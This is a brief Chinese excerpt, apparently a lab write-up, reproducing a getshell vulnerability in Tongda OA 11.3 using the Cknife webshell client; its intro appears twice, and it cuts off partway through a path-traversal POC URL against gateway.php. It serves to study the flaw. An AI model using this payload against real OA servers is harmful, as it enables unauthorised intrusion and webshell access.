通达 OA 的 getshell 漏洞复现
准备漏洞环境: 我使用的是从官网下载的最新版 本机:Windows10+Cknife 连接 shell 漏洞环境:通达 OA11.3 版服务端(2020-01-03 12:50) 开始复现 1、开始安装环境,一步步的傻瓜式安装,然后启动环境 2、然后拿出我们的 POC /ispirit/interface/gateway.php?json={}&url=../../ispirit/../. …
准备漏洞环境: 我使用的是从官网下载的最新版 本机:Windows10+Cknife 连接 shell 漏洞环境:通达 OA11.3 版服务端(2020-01-03 12:50) 开始复现 1、开始安装环境,一步步的傻瓜式安装,然后启动环境 2、然后拿出我们的 POC /ispirit/interface/gateway.php?json={}&url=../../ispirit/../. …